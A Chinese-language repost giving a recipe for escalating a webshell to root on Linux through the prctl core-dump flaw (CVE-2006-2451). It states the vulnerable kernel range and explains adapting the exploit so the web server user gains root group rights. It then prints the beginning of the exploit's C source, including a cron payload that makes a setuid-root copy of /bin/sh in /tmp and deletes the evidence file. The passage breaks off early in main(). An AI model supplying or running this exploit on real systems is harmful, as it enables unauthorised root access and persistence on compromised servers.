Linux内核PRCTL提权漏洞利用：从Webshell到ROOT权限

【转】Linux下WEBSHELL提权一技
用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
前提：1、目标机上安装了GCC能编译源码
                 2、Kernel 2.6.x         (>= 2.6.13 && < 2.6.17.4)   
因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.
/**********溢出代码**************************/
/* Local r00t Exploit for:                                 */
/* Linux Kernel PRCTL Core Dump Handling                   */
/* ( BID 18874 / CVE-2006-2451 )                           */
/* Kernel 2.6.x        (>= 2.6.13 && < 2.6.17.4)                 */
/* By:                                                     */
/* - dreyer          <luna@aditel.org>         (main PoC code)         */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                        [ 10.Jul.2006 ]        */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *         root         cp /bin/sh /tmp/sh ; ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
          int child;
          struct rlimit corelimit;